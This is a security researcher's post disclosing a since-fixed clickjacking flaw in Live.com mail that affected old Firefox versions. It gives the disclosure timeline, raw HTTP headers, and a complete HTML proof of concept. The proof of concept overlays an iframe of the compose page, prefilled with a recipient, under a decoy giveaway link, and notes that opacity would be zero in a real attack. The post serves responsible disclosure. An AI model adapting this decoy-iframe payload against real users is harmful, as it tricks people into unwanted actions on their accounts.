On 7/29/13 I’ve reported Live.com XFO vulnerability to the Microsoft Security team and finally their investigation came to conclusion and fixed the bug. So, Here is details of bug and timeline of fixing bug. A year ago on the weekend, I started digging into MS services for bugs and this vulnerability seems to be more interesting to share on the Garage4Hackers.
The timeline of investigation of the bug : July 29, 2013 – April 16 , 2014.
The interesting part of the vulnerability all pages were protected for UI Addressing Attack and while doing testing, normally I test application on the all browsers. The weird part comes here, I was able to iframe the all the pages of Live.com including pre-authentication and post-authentication pages on Mozilla Firefox 3.6.28 to Mozilla Firefox 6. On Chrome and on other browser all pages functionality of XFO was working perfectly.
Random announcement , nothing do with this post : Check out recorded video of Garage4Hackers Ranchoddas Webcast Series – Browser Crash Analysis By David Rude II aka Bannedit
Note : Have look the same vulnerability on Facebook Application Installing
Obviously , you must be thinking why this thing is happening with Mozilla. After doing some research and consulting with G4H team , I’ve concluded, it may be issue with Gecko Engine. The test environment was win 7 , ubuntu 10,11,12.
Note : If you stumbled upon on the same issue of Gecko, then please do reply on this thread.
Check out the following headers , XFO header is missing on Gecko/20120306 Firefox/3.6.28 to MF 6.
https://blu166.mail.live.com/m/?bfv=wm GET /m/?bfv=wm HTTP/1.1 Host: blu166.mail.live.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Encoding: gzip Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-Wlp-StartTime: 29-07-2013 10:10:32 AM xxn: 22 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" MSNSERVER: H: BLU166-W22 V: 17.1.6722.6001 D: 2013-07-22T22:56:20 X-Powered-By: ASP.NET Content-Length: 3113 Date: Mon, 29 Jul 2013 10:10:32 GMT Connection: keep-alive Set-Cookie: bfv=wm; domain=.live.com; path=/ Set-Cookie: widecontext=X; path=/; secure Set-Cookie: domain=.live.com; path=/ Set-Cookie: xidseq=7; domain=.live.com; path=/ Set-Cookie: LD=; domain=.live.com; expires=Mon, 29-Jul-2013 08:30:32 GMT; path=/ Cache-Control: no-cache, no-store, must-revalidate, no-transform Pragma: no-cache Expires: -1, -1
Here is some print screen of basic operations of live.com (I would like to remind you , every page of live.com was vulnerable )
Attacker developed this page to attack on victim.
Composing Email :
Uploading Attachment :
Deleting Emails :
[IMG]https://dl.dropboxusercontent.com/u/18007092/ms-click4.png[IMG]
HTML POC , which i used sent to MS Security Team
<html> <!-- This Quick Developed POC , for testing purpose --!> <!-- Visit Garage4hackers.com --!> <head> <title> Live Mail Send Clickjacking - Garage4hackers.com </title> <style> iframe { width:800px; height:800px; position:absolute; top:0; left:0; filter:alpha(opacity=50); /* in real life opacity=0 */ opacity:0.5; } </style> </head> <body> <br> <br> <br> <br> <br> <br> <br> <br> <div><center>Bhag Milkha Bhag Competition</center></div> <center><b>Click Connect, You will Bhag Muilkha Bhag T-shirts. </b></center> <iframe src="https://blu166.mail.live.com/m/compose.m/?fid=00000000-0000-0000-0000-000000000001&to=sandeepk.l337@gmail.com"></iframe> <a href="http://www.google.com" target="_blank" style="position: relative; left: 0px; top: 220px; z-index: -1;">Connect</a> </body> </html>
Let me know if you have any question about this bug
– [S]